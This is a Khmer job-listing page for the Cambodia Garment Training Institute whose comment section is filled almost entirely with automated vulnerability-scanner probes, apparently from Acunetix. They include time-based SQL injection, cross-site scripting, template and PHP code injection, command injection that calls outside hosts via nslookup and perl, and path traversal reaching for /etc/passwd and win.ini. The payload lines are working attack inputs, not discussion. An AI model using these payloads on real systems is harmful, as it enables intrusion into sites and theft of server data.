ថ្ងៃទី 14 - 15 ខែ វិច្ឆិកា ឆ្នាំ 2020 ក្រសួងការងារ និងបណ្តុះបណ្តាលវិជ្ជាជីវៈ

វិទ្យាស្ថាន​បណ្តុះ​បណ្តាល​វិស័យកាត់​ដេរ​នៅកម្ពុជា

តើពួកយើងជានរណា?

ដោយឃើញថា តម្រូវការកម្លាំងពលកម្មជាក់ស្ដែងនៅក្នុងវិស័យឧស្សាហកម្មកាត់ដេរមានការកើនឡើង ទន្ទឹមនេះ កម្លាំងពលកម្មជំនាញ/បច្ចេកទេស កម្មករនិយោជិក ដែលឆ្លើយតបទៅនឹងតម្រូវការទីផ្សារការងារសព្វថ្ងៃនៅកម្ពុជានៅមានកម្រិត សមាគមរោងច​ក្រកាត់ដេរកម្ពុជា (GMAC) ជាមួយក្រុមហ៊ុនដៃគូ បានរួមគ្នាបង្កើតឡើងនូវវិទ្យាស្ថានបណ្ដុះបណ្ដាលវិស័យកាត់ដេរនៅកម្ពុជា (CGTI) ក្នុងគោលដៅផ្ដល់នូវការបណ្ដុះបណ្ដាលសមត្ថភាពប្រកបដោយបរិមាណ និងគុណភាព។

លេខទូស័ព្ទ៖ ០៨៩ ៩៣៩ ១៩០/ ០៩៧ ៥៩០៥ ២០៥/០៨៦ ៧២៧ ២៨១

វែបផ្សាយ៖ www.cgti-cambodia.org


ដាក់ពាក្យស្មើសុំការងារ (CV)!

ចំនួន CV ដែលបានដាក់ពាក្យរួច 31

សូមរៀបចំ CV ជាទម្រង់ Microsoft Word, PDF ឬជារូបភាព JPG។ ទំហំមិនធំជាង 5MB។


តម្រូវការជ្រើសរើសកម្លាំងពលកម្ម សរុប 210 កន្លែង

   
សំណួរ ចម្លើយ ឬ មតិយោបល់ ទៅក្រុមហ៊ុន

 • pHqghUme

  2021-05-06 08:52:40


  @@JvO6Q


 • pHqghUme

  2021-05-06 08:52:36


  1'"


 • pHqghUme

  2021-05-06 08:52:34


  1'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'


 • pHqghUme

  2021-05-06 08:52:11


  1*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)


 • pHqghUme

  2021-05-06 08:51:51


  BHdAOIhu')) OR 275=(SELECT 275 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:51:28


  wmmkau2n') OR 307=(SELECT 307 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:51:10


  cFz0mVvW' OR 230=(SELECT 230 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:50:54


  -1)) OR 150=(SELECT 150 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:50:40


  -5) OR 265=(SELECT 265 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:50:23


  -5 OR 952=(SELECT 952 FROM PG_SLEEP(15))--


 • pHqghUme

  2021-05-06 08:50:06


  2Gi5ReTP'; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:49:46


  1 waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:49:31


  -1); waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:49:14


  -1; waitfor delay '0:0:15' --


 • pHqghUme

  2021-05-06 08:48:54


  (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/


 • pHqghUme

  2021-05-06 08:48:39


  0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z


 • pHqghUme

  2021-05-06 08:48:22


  0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z


 • pHqghUme

  2021-05-06 08:48:04


  if(now()=sysdate(),sleep(15),0)


 • pHqghUme

  2021-05-06 08:47:47


  -1" OR 2+906-906-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 08:47:46


  -1' OR 2+265-265-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 08:47:46


  -1' OR 2+542-542-1=0+0+0+1 or '64SWvYxj'='


 • pHqghUme

  2021-05-06 08:47:45


  -1 OR 2+519-519-1=0+0+0+1


 • pHqghUme

  2021-05-06 08:47:44


  -1 OR 2+557-557-1=0+0+0+1 --


 • pHqghUme

  2021-05-06 08:47:42


  kxPjpjug


 • pHqghUme

  2021-05-06 08:47:27


  1


 • pHqghUme

  2021-05-06 08:47:07


  1


 • @@RNkE0

  2021-05-06 08:46:49


  1


 • 1'"

  2021-05-06 08:46:46


  1


 • pHqghUme'||DBMS_PIPE.RECEIVE_MESSAGE(CHR(98)||CHR(98)||CHR(98),15)||'

  2021-05-06 08:46:42


  1


 • FoYXszHE')) OR 308=(SELECT 308 FROM PG_SLEEP(15))--

  2021-05-06 08:46:28


  1


 • iBdf2Fk7') OR 689=(SELECT 689 FROM PG_SLEEP(15))--

  2021-05-06 08:46:11


  1


 • NcJbqiCL' OR 689=(SELECT 689 FROM PG_SLEEP(15))--

  2021-05-06 08:45:45


  1


 • BQHbjccs'; waitfor delay '0:0:15' --

  2021-05-06 08:45:28


  1


 • 1 waitfor delay '0:0:15' --

  2021-05-06 08:45:04


  1


 • (select(0)from(select(sleep(15)))v)/*'+(select(0)from(select(sleep(15)))v)+'"+(select(0)from(select(sleep(15)))v)+"*/

  2021-05-06 08:44:40


  1


 • 0"XOR(if(now()=sysdate(),sleep(15),0))XOR"Z

  2021-05-06 08:44:18


  1


 • 0'XOR(if(now()=sysdate(),sleep(15),0))XOR'Z

  2021-05-06 08:44:01


  1


 • if(now()=sysdate(),sleep(15),0)

  2021-05-06 08:43:44


  1


 • -1' OR 2+147-147-1=0+0+0+1 or 'U19WQUHQ'='

  2021-05-06 08:43:27


  1


 • -1" OR 2+257-257-1=0+0+0+1 --

  2021-05-06 08:43:27


  1


 • -1' OR 2+584-584-1=0+0+0+1 --

  2021-05-06 08:43:26


  1


 • -1 OR 2+630-630-1=0+0+0+1 --

  2021-05-06 08:43:25


  1


 • -1 OR 2+238-238-1=0+0+0+1

  2021-05-06 08:43:25


  1


 • OJSotOwP

  2021-05-06 08:43:24


  1


 • pHqghUme

  2021-05-06 08:43:08


  1


 • pHqghUme

  2021-05-06 08:42:47


  1


 • pHqghUme

  2021-05-06 08:42:23


  1


 • pHqghUme

  2021-05-06 08:42:18


  1


 • pHqghUme

  2021-05-06 08:42:16


  1


 • pHqghUme

  2021-05-06 08:41:58


  1


 • pHqghUme

  2021-05-06 08:41:35


  1


 • pHqghUme

  2021-05-06 08:41:13


  1


 • pHqghUme

  2021-05-06 08:40:52


  1


 • pHqghUme

  2021-05-06 08:40:30


  1


 • pHqghUme

  2021-05-06 08:40:03


  1


 • pHqghUme

  2021-05-06 08:39:41


  1


 • pHqghUme

  2021-05-06 08:39:19


  1


 • pHqghUme

  2021-05-06 08:38:59


  1


 • pHqghUme

  2021-05-06 08:38:39


  1


 • pHqghUme

  2021-05-06 08:38:38


  1


 • pHqghUme

  2021-05-06 08:38:37


  1


 • pHqghUme

  2021-05-06 08:38:36


  1


 • pHqghUme

  2021-05-06 08:38:34


  1


 • pHqghUme

  2021-05-06 08:38:33


  1


 • pHqghUme

  2021-05-06 08:38:14


  1


 • pHqghUme

  2021-05-06 08:37:53


  1


 • pHqghUme

  2021-05-06 08:37:36


  1


 • pHqghUme

  2021-05-06 08:37:33


  1


 • pHqghUme

  2021-05-06 08:37:32


  1


 • pHqghUme

  2021-05-06 08:37:10


  1


 • pHqghUme

  2021-05-06 08:36:43


  1


 • pHqghUme

  2021-05-06 08:36:24


  1


 • pHqghUme

  2021-05-06 08:36:03


  1


 • pHqghUme

  2021-05-06 08:35:45


  1


 • pHqghUme

  2021-05-06 08:35:25


  1


 • pHqghUme

  2021-05-06 08:35:06


  1


 • pHqghUme

  2021-05-06 08:35:05


  1<4lWj0R<


 • pHqghUme

  2021-05-06 08:34:56


  1<img sRc='http://attacker-9421/log.php?


 • pHqghUme

  2021-05-06 08:34:47


  1<0d4SFJ x=9054>


 • pHqghUme

  2021-05-06 08:34:45


  1


 • pHqghUme

  2021-05-06 08:34:41


  1<ifRAme sRc=9514.com></IfRamE>


 • pHqghUme

  2021-05-06 08:34:34


  1<WRODXO>Q76OA[!+!]</WRODXO>


 • pHqghUme

  2021-05-06 08:34:29


  1


 • pHqghUme

  2021-05-06 08:34:26


  1x8jch <ScRiPt >opED(9538)</ScRiPt>


 • pHqghUme

  2021-05-06 08:34:18


  1<% contenteditable onresize=opED(9700)>


 • pHqghUme

  2021-05-06 08:34:13


  1


 • pHqghUme

  2021-05-06 08:34:13


  1}body{acu:Expre/**/SSion(opED(9602))}


 • pHqghUme

  2021-05-06 08:34:12


  1


 • pHqghUme

  2021-05-06 08:34:12


  1


 • pHqghUme

  2021-05-06 08:34:11


  1


 • pHqghUme

  2021-05-06 08:34:11


  1


 • pHqghUme

  2021-05-06 08:34:10


  1


 • pHqghUme

  2021-05-06 08:34:09


  <a HrEF=jaVaScRiPT:>


 • pHqghUme

  2021-05-06 08:34:03


  <a HrEF=http://xss.bxss.me></a>


 • pHqghUme

  2021-05-06 08:33:58


  1<input autofocus onfocus=opED(9413)>


 • pHqghUme

  2021-05-06 08:33:54


  1


 • pHqghUme

  2021-05-06 08:33:48


  1&lt;ScRiPt&gt;opED(9363)&lt;/sCripT&gt;


 • pHqghUme

  2021-05-06 08:33:42


  1\u003CScRiPt\opED(9304)\u003C/sCripT\u003E


 • pHqghUme

  2021-05-06 08:33:36


  %31%3C%53%63%52%69%50%74%20%3E%6F%70%45%44%289192%29%3C%2F%73%43%72%69%70%54%3E


 • pHqghUme

  2021-05-06 08:33:34


  1


 • pHqghUme

  2021-05-06 08:33:30


  1<img/src=">" onerror=alert(9370)>


 • pHqghUme

  2021-05-06 08:33:20


  1<img src=xyz OnErRor=opED(9521)>


 • pHqghUme

  2021-05-06 08:33:14


  1<img src=//xss.bxss.me/t/dot.gif onload=opED(9568)>


 • pHqghUme

  2021-05-06 08:33:04


  1<body onload=opED(9759)>


 • pHqghUme

  2021-05-06 08:32:59


  1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9031'>


 • pHqghUme

  2021-05-06 08:32:54


  1<isindex type=image src=1 onerror=opED(9983)>


 • pHqghUme

  2021-05-06 08:32:45


  1<ScRiPt >opED(9378)</ScRiPt>


 • pHqghUme

  2021-05-06 08:32:37


  1<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9234></ScRiPt>


 • pHqghUme

  2021-05-06 08:32:29


  1<ScRiPt >opED(9874)</ScRiPt>


 • pHqghUme

  2021-05-06 08:32:21


  1%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%6F%70%45%44%28%39%37%37%33%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E


 • pHqghUme

  2021-05-06 08:32:13


  1<script>opED(9143)</script>


 • pHqghUme

  2021-05-06 08:32:03


  1<WPQVHO>ZBDIX[!+!]</WPQVHO>


 • pHqghUme

  2021-05-06 08:31:58


  1<ScRiPt >opED(9579)</ScRiPt>


 • pHqghUme

  2021-05-06 08:31:55


  "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")


 • pHqghUme

  2021-05-06 08:31:50


  acx__${98991*97996}__::.x


 • pHqghUme

  2021-05-06 08:31:45


  acx[[${98991*97996}]]xca


 • pHqghUme

  2021-05-06 08:31:40


  acx{{98991*97996}}xca


 • pHqghUme

  2021-05-06 08:31:33


  1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 08:31:27


  <th:t="${acx}#foreach


 • pHqghUme

  2021-05-06 08:31:23


  <%={{={@{#{${acx}}%>


 • pHqghUme

  2021-05-06 08:31:17


  acux5277%C0%BEz1%C0%BCz2a%90bcxuca5277


 • pHqghUme

  2021-05-06 08:31:10


  acu3809%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca3809


 • pHqghUme

  2021-05-06 08:31:05


  19868503


 • pHqghUme

  2021-05-06 08:31:01


  '"()&%<acx><ScRiPt >opED(9639)</ScRiPt>


 • pHqghUme

  2021-05-06 08:30:57


  1'"()&%<acx><ScRiPt >opED(9879)</ScRiPt>


 • pHqghUme<OAKLl1<

  2021-05-06 08:30:49


  1


 • pHqghUme<img sRc='http://attacker-9380/log.php?

  2021-05-06 08:30:45


  1


 • pHqghUme<EjQFaf x=9809>

  2021-05-06 08:30:39


  1


 • pHqghUme<ifRAme sRc=9211.com></IfRamE>

  2021-05-06 08:30:34


  1


 • pHqghUme<W9PAKF>PEIX8[!+!]</W9PAKF>

  2021-05-06 08:30:29


  1


 • pHqghUmeRb24v <ScRiPt >opED(9416)</ScRiPt>

  2021-05-06 08:30:24


  1


 • pHqghUme<% contenteditable onresize=opED(9819)>

  2021-05-06 08:30:18


  1


 • pHqghUme}body{acu:Expre/**/SSion(opED(9267))}

  2021-05-06 08:30:12


  1


 • <a HrEF=jaVaScRiPT:>

  2021-05-06 08:29:59


  1


 • <a HrEF=http://xss.bxss.me></a>

  2021-05-06 08:29:54


  1


 • pHqghUme<input autofocus onfocus=opED(9627)>

  2021-05-06 08:29:49


  1


 • pHqghUme&lt;ScRiPt&gt;opED(9755)&lt;/sCripT&gt;

  2021-05-06 08:29:36


  1


 • pHqghUme\u003CScRiPt\opED(9102)\u003C/sCripT\u003E

  2021-05-06 08:29:31


  1


 • %70%48%71%67%68%55%6D%65%3C%53%63%52%69%50%74%20%3E%6F%70%45%44%289111%29%3C%2F%73%43%72%69%70%54%3E

  2021-05-06 08:29:27


  1


 • pHqghUme<img/src=">" onerror=alert(9175)>

  2021-05-06 08:29:21


  1


 • pHqghUme<img src=xyz OnErRor=opED(9757)>

  2021-05-06 08:29:17


  1


 • pHqghUme<img src=//xss.bxss.me/t/dot.gif onload=opED(9641)>

  2021-05-06 08:29:13


  1


 • pHqghUme<body onload=opED(9879)>

  2021-05-06 08:29:09


  1


 • pHqghUme<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9004'>

  2021-05-06 08:29:04


  1


 • pHqghUme<isindex type=image src=1 onerror=opED(9157)>

  2021-05-06 08:28:59


  1


 • pHqghUme<ScRiPt >opED(9617)</ScRiPt>

  2021-05-06 08:28:53


  1


 • pHqghUme

  2021-05-06 08:28:43


  1


 • pHqghUme<ScRiPt/acu src=//xss.bxss.me/t/xss.js?9770></ScRiPt>

  2021-05-06 08:28:41


  1


 • pHqghUme<ScRiPt >opED(9139)</ScRiPt>

  2021-05-06 08:28:33


  1


 • pHqghUme%3C%53%63%52%3C%53%63%52%69%50%74%3E%49%70%54%3E%6F%70%45%44%28%39%35%30%34%29%3C%2F%73%43%72%3C%53%63%52%69%50%74%3E%49%70%54%3E

  2021-05-06 08:28:26


  1


 • pHqghUme<script>opED(9574)</script>

  2021-05-06 08:28:17


  1


 • pHqghUme

  2021-05-06 08:28:16


  1


 • pHqghUme<WUGT9Q>AZE1X[!+!]</WUGT9Q>

  2021-05-06 08:28:10


  1


 • pHqghUme<ScRiPt >opED(9535)</ScRiPt>

  2021-05-06 08:28:03


  1


 • "acxzzzzzzzzbbbccccdddeeexca".replace("z","o")

  2021-05-06 08:27:55


  1


 • acx__${98991*97996}__::.x

  2021-05-06 08:27:48


  1


 • acx[[${98991*97996}]]xca

  2021-05-06 08:27:41


  1


 • acx{{98991*97996}}xca

  2021-05-06 08:27:32


  1


 • 1}}"}}'}}1%>"%>'%><%={{={@{#{${acx}}%>

  2021-05-06 08:27:27


  1


 • <th:t="${acx}#foreach

  2021-05-06 08:27:22


  1


 • <%={{={@{#{${acx}}%>

  2021-05-06 08:27:17


  1


 • acux6048%C0%BEz1%C0%BCz2a%90bcxuca6048

  2021-05-06 08:27:12


  1


 • acu6412%EF%BC%9Cs1%EF%B9%A5s2%CA%BAs3%CA%B9uca6412

  2021-05-06 08:27:06


  1


 • pHqghUme9739816

  2021-05-06 08:27:00


  1


 • '"()&%<acx><ScRiPt >opED(9275)</ScRiPt>

  2021-05-06 08:26:55


  1


 • pHqghUme'"()&%<acx><ScRiPt >opED(9644)</ScRiPt>

  2021-05-06 08:26:49


  1


 • pHqghUme

  2021-05-06 08:26:44


  1


 • pHqghUme

  2021-05-06 08:26:34


  1


 • pHqghUme

  2021-05-06 08:26:26


  1


 • pHqghUme

  2021-05-06 08:26:18


  1


 • pHqghUme

  2021-05-06 08:26:10


  1


 • pHqghUme

  2021-05-06 08:26:03


  1


 • pHqghUme

  2021-05-06 08:26:00


  <!--


 • pHqghUme

  2021-05-06 08:26:00


  '.print(md5(31337)).'


 • pHqghUme

  2021-05-06 08:25:59


  '"


 • pHqghUme

  2021-05-06 08:25:59


  ${@print(md5(31337))}\


 • pHqghUme

  2021-05-06 08:25:58


  ${@print(md5(31337))}


 • <!--

  2021-05-06 08:25:58


  1


 • '"

  2021-05-06 08:25:57


  1


 • pHqghUme

  2021-05-06 08:25:57


  ";print(md5(31337));$a="


 • pHqghUme

  2021-05-06 08:25:56


  ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));


 • pHqghUme

  2021-05-06 08:25:56


  1


 • pHqghUme

  2021-05-06 08:25:56


  ';print(md5(31337));$a='


 • pHqghUme

  2021-05-06 08:25:55


  1


 • '.print(md5(31337)).'

  2021-05-06 08:25:55


  1


 • pHqghUme

  2021-05-06 08:25:55


  1


 • ${@print(md5(31337))}

  2021-05-06 08:25:54


  1


 • pHqghUme

  2021-05-06 08:25:54


  1


 • ${@print(md5(31337))}\

  2021-05-06 08:25:54


  1


 • ";print(md5(31337));$a="

  2021-05-06 08:25:53


  1


 • pHqghUme

  2021-05-06 08:25:52


  '+'A'.concat(70-3).concat(22*4).concat(109).concat(81).concat(107).concat(84)+(require'socket' Socket.gethostbyname('hitfi'+'syzwcxkh4e96a.bxss.me.')[3].to_s)+'


 • pHqghUme

  2021-05-06 08:25:52


  /xfs.bxss.me


 • pHqghUme

  2021-05-06 08:25:51


  "+"A".concat(70-3).concat(22*4).concat(110).concat(69).concat(119).concat(85)+(require"socket" Socket.gethostbyname("hitok"+"cavldfha78f46.bxss.me.")[3].to_s)+"


 • pHqghUme

  2021-05-06 08:25:51


  1


 • ;assert(base64_decode('cHJpbnQobWQ1KDMxMzM3KSk7'));

  2021-05-06 08:25:51


  1


 • /xfs.bxss.me

  2021-05-06 08:25:51


  1


 • ';print(md5(31337));$a='

  2021-05-06 08:25:51


  1


 • '+'A'.concat(70-3).concat(22*4).concat(107).concat(74).concat(111).concat(85)+(require'socket' Socket.gethostbyname('hitwr'+'kszmknkydcb84.bxss.me.')[3].to_s)+'

  2021-05-06 08:25:50


  1


 • pHqghUme

  2021-05-06 08:25:50


  1


 • pHqghUme

  2021-05-06 08:25:50


  1


 • pHqghUme

  2021-05-06 08:25:49


  1


 • "+"A".concat(70-3).concat(22*4).concat(122).concat(78).concat(108).concat(69)+(require"socket" Socket.gethostbyname("hitlq"+"jrgelsjbb19d6.bxss.me.")[3].to_s)+"

  2021-05-06 08:25:49


  1


 • )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

  2021-05-06 08:25:49


  1


 • pHqghUme

  2021-05-06 08:25:49


  1


 • pHqghUme

  2021-05-06 08:25:49


  )))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))


 • pHqghUme

  2021-05-06 08:25:48


  bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 08:25:48


  1


 • pHqghUme

  2021-05-06 08:25:48


  1


 • pHqghUme

  2021-05-06 08:25:48


  1


 • pHqghUme

  2021-05-06 08:25:47


  HttP://bxss.me/t/xss.html?%00


 • pHqghUme

  2021-05-06 08:25:47


  1


 • pHqghUme

  2021-05-06 08:25:47


  1


 • pHqghUme

  2021-05-06 08:25:47


  1


 • bxss.me/t/xss.html?%00

  2021-05-06 08:25:46


  1


 • pHqghUme

  2021-05-06 08:25:46


  1


 • pHqghUme

  2021-05-06 08:25:46


  1


 • HttP://bxss.me/t/xss.html?%00

  2021-05-06 08:25:45


  1


 • pHqghUme

  2021-05-06 08:25:45


  1


 • pHqghUme

  2021-05-06 08:25:45


  1


 • pHqghUme

  2021-05-06 08:25:44


  1


 • pHqghUme

  2021-05-06 08:25:44


  1


 • pHqghUme

  2021-05-06 08:25:44


  1


 • pHqghUme

  2021-05-06 08:25:43


  1


 • pHqghUme

  2021-05-06 08:25:43


  1


 • pHqghUme

  2021-05-06 08:25:42


  1


 • pHqghUme

  2021-05-06 08:25:42


  '"()


 • pHqghUme

  2021-05-06 08:25:42


  1


 • pHqghUme

  2021-05-06 08:25:42


  1


 • pHqghUme

  2021-05-06 08:25:42


  1


 • pHqghUme

  2021-05-06 08:25:39


  ".gethostbyname(lc("hitib"."okmxunla1d16c.bxss.me."))."A".chr(67).chr(hex("58")).chr(110).chr(81).chr(107).chr(69)."


 • '"()

  2021-05-06 08:25:38


  1


 • pHqghUme

  2021-05-06 08:25:38


  '.gethostbyname(lc('hittn'.'aabrrigl8b936.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(114).chr(81).chr(121).chr(86).'


 • ".gethostbyname(lc("hitkg"."rrlktisb5cb91.bxss.me."))."A".chr(67).chr(hex("58")).chr(102).chr(74).chr(109).chr(78)."

  2021-05-06 08:25:37


  1


 • pHqghUme

  2021-05-06 08:25:36


  1


 • '.gethostbyname(lc('hitif'.'mhtzxxla16475.bxss.me.')).'A'.chr(67).chr(hex('58')).chr(121).chr(78).chr(119).chr(80).'

  2021-05-06 08:25:36


  1


 • pHqghUme

  2021-05-06 08:25:35


  1


 • pHqghUme

  2021-05-06 08:25:35


  1


 • pHqghUme

  2021-05-06 08:25:34


  1


 • pHqghUme

  2021-05-06 08:25:33


  1


 • pHqghUme

  2021-05-06 08:25:32


  ^(#$!@#$)(()))******


 • pHqghUme

  2021-05-06 08:25:31


  )


 • pHqghUme

  2021-05-06 08:25:31


  !(()&&!|*|*|


 • !(()&&!|*|*|

  2021-05-06 08:25:30


  1


 • ^(#$!@#$)(()))******

  2021-05-06 08:25:30


  1


 • pHqghUme

  2021-05-06 08:25:30


  1&n971904=v958795


 • pHqghUme

  2021-05-06 08:25:29


  |(nslookup hitbtdduclwkwd86b7.bxss.me||perl -e "gethostbyname('hitbtdduclwkwd86b7.bxss.me')")


 • pHqghUme

  2021-05-06 08:25:29


  1


 • pHqghUme

  2021-05-06 08:25:29


  1


 • )

  2021-05-06 08:25:29


  1


 • pHqghUme

  2021-05-06 08:25:29


  `(nslookup hitgszzfkenjde49b4.bxss.me||perl -e "gethostbyname('hitgszzfkenjde49b4.bxss.me')")`


 • pHqghUme

  2021-05-06 08:25:28


  1


 • pHqghUme

  2021-05-06 08:25:28


  1


 • pHqghUme

  2021-05-06 08:25:27


  1


 • pHqghUme

  2021-05-06 08:25:24


  1


 • pHqghUme&n965871=v906999

  2021-05-06 08:25:24


  1


 • pHqghUme

  2021-05-06 08:25:24


  1


 • pHqghUme

  2021-05-06 08:25:23


  (nslookup hithrjmkeoncs474d4.bxss.me||perl -e "gethostbyname('hithrjmkeoncs474d4.bxss.me')")


 • pHqghUme

  2021-05-06 08:25:23


  $(nslookup hitflmacxgtvu6f51a.bxss.me||perl -e "gethostbyname('hitflmacxgtvu6f51a.bxss.me')")


 • pHqghUme

  2021-05-06 08:25:22


  &echo rticmc$()\ vzebxr\nz^xyu||a #' &echo rticmc$()\ vzebxr\nz^xyu||a #|" &echo rticmc$()\ vzebxr\nz^xyu||a #


 • pHqghUme

  2021-05-06 08:25:22


  bxss.me


 • pHqghUme

  2021-05-06 08:25:22


  |echo wqkzhq$()\ mvmyni\nz^xyu||a #' |echo wqkzhq$()\ mvmyni\nz^xyu||a #|" |echo wqkzhq$()\ mvmyni\nz^xyu||a #


 • pHqghUme

  2021-05-06 08:25:21


  Http://bxss.me/t/fit.txt


 • pHqghUme

  2021-05-06 08:25:21


  echo pocbut$()\ elkivu\nz^xyu||a #' &echo pocbut$()\ elkivu\nz^xyu||a #|" &echo pocbut$()\ elkivu\nz^xyu||a #


 • pHqghUme

  2021-05-06 08:25:21


  http://bxss.me/t/fit.txt%3F.jpg


 • pHqghUme

  2021-05-06 08:25:20


  http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg


 • pHqghUme

  2021-05-06 08:25:20


  1some_inexistent_file_with_long_name%00.jpg


 • bxss.me

  2021-05-06 08:25:19


  1


 • `(nslookup hitcibfvbxiro3700e.bxss.me||perl -e "gethostbyname('hitcibfvbxiro3700e.bxss.me')")`

  2021-05-06 08:25:18


  1


 • pHqghUme

  2021-05-06 08:25:18


  1


 • http://bxss.me/t/fit.txt%3F.jpg

  2021-05-06 08:25:18


  1


 • 1some_inexistent_file_with_long_name%00.jpg

  2021-05-06 08:25:17


  1


 • |(nslookup hitrbnnhfuqur68503.bxss.me||perl -e "gethostbyname('hitrbnnhfuqur68503.bxss.me')")

  2021-05-06 08:25:17


  1


 • Http://bxss.me/t/fit.txt

  2021-05-06 08:25:17


  1


 • pHqghUme

  2021-05-06 08:25:16


  1


 • http://some-inexistent-website.acu/some_inexistent_file_with_long_name%3F.jpg

  2021-05-06 08:25:16


  1


 • pHqghUme

  2021-05-06 08:25:15


  1


 • $(nslookup hitwjdelqubti756f1.bxss.me||perl -e "gethostbyname('hitwjdelqubti756f1.bxss.me')")

  2021-05-06 08:25:14


  1


 • pHqghUme

  2021-05-06 08:25:14


  1


 • |echo zixeql$()\ knurxv\nz^xyu||a #' |echo zixeql$()\ knurxv\nz^xyu||a #|" |echo zixeql$()\ knurxv\nz^xyu||a #

  2021-05-06 08:25:13


  1


 • pHqghUme

  2021-05-06 08:25:13


  1


 • (nslookup hitqoqbvmejez19f55.bxss.me||perl -e "gethostbyname('hitqoqbvmejez19f55.bxss.me')")

  2021-05-06 08:25:13


  1


 • pHqghUme

  2021-05-06 08:25:13


  1


 • pHqghUme

  2021-05-06 08:25:13


  12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡


 • pHqghUme

  2021-05-06 08:25:12


  1


 • &echo ekrpfe$()\ iwwgdp\nz^xyu||a #' &echo ekrpfe$()\ iwwgdp\nz^xyu||a #|" &echo ekrpfe$()\ iwwgdp\nz^xyu||a #

  2021-05-06 08:25:12


  1


 • pHqghUme

  2021-05-06 08:25:12


  1


 • pHqghUme

  2021-05-06 08:25:11


  1


 • echo daympu$()\ jbhqmj\nz^xyu||a #' &echo daympu$()\ jbhqmj\nz^xyu||a #|" &echo daympu$()\ jbhqmj\nz^xyu||a #

  2021-05-06 08:25:11


  1


 • pHqghUme

  2021-05-06 08:25:10


  1


 • pHqghUme

  2021-05-06 08:25:09


  1


 • pHqghUme

  2021-05-06 08:25:09


  1


 • pHqghUme

  2021-05-06 08:25:08


  1


 • pHqghUme

  2021-05-06 08:25:08


  1


 • aTY3SGFuMGU=

  2021-05-06 08:25:05


  1


 • pHqghUme

  2021-05-06 08:25:04


  ${10000379+10000364}


 • pHqghUme

  2021-05-06 08:25:04


  1<esi:include src="http://bxss.me/rpb.png"/>


 • 12345'"\'\");|]*%00{%0d%0a<%00>%bf%27'💡

  2021-05-06 08:25:04


  1


 • pHqghUme

  2021-05-06 08:25:03


  1


 • pHqghUme<esi:include src="http://bxss.me/rpb.png"/>

  2021-05-06 08:25:03


  1


 • ${9999985+9999492}

  2021-05-06 08:25:03


  1


 • pHqghUme

  2021-05-06 08:25:03


  1


 • pHqghUme

  2021-05-06 08:25:02


  1


 • pHqghUme

  2021-05-06 08:25:02


  1


 • pHqghUme

  2021-05-06 08:25:02


  1


 • pHqghUme

  2021-05-06 08:25:01


  1


 • pHqghUme

  2021-05-06 08:25:01


  1


 • pHqghUme

  2021-05-06 08:25:01


  1


 • pHqghUme

  2021-05-06 08:25:00


  1


 • pHqghUme

  2021-05-06 08:24:59


  1


 • pHqghUme

  2021-05-06 08:24:59


  ../1


 • pHqghUme

  2021-05-06 08:24:58


  ../../../../../../../../../../../../../../etc/passwd


 • pHqghUme

  2021-05-06 08:24:58


  ../../../../../../../../../../../../../../windows/win.ini


 • ../pHqghUme

  2021-05-06 08:24:57


  1


 • ../../../../../../../../../../../../../../windows/win.ini

  2021-05-06 08:24:56


  1


 • pHqghUme

  2021-05-06 08:24:56


  1


 • pHqghUme

  2021-05-06 08:24:56


  1


 • pHqghUme

  2021-05-06 08:24:56


  1


 • pHqghUme

  2021-05-06 08:24:55


  1


 • ../../../../../../../../../../../../../../etc/passwd

  2021-05-06 08:24:55


  1


 • pHqghUme

  2021-05-06 08:24:55


  1


 • pHqghUme

  2021-05-06 08:24:54


  1


 • pHqghUme

  2021-05-06 08:24:54


  1


 • pHqghUme

  2021-05-06 08:24:53


  1


 • pHqghUme

  2021-05-06 08:24:53


  1


 • pHqghUme

  2021-05-06 08:24:52


  1


 • pHqghUme

  2021-05-06 08:24:52


  1


 • pHqghUme

  2021-05-06 08:24:52


  1


 • pHqghUme

  2021-05-06 08:24:51


  1


 • pHqghUme

  2021-05-06 08:24:51


  1


 • pHqghUme

  2021-05-06 08:24:51


  1


 • pHqghUme

  2021-05-06 08:24:50


  1


 • pHqghUme

  2021-05-06 08:24:50


  1


 • pHqghUme

  2021-05-06 08:24:50


  1


 • pHqghUme

  2021-05-06 08:24:50


  1


 • pHqghUme

  2021-05-06 08:24:50


  1


 • pHqghUme

  2021-05-06 08:24:47


  1


 • hhejTJ7M

  2021-05-06 08:24:45


  1


 • pHqghUme

  2021-05-06 08:24:45


  hR9wU7eY


 • pHqghUme

  2021-05-06 08:24:44


  1


 • pHqghUme

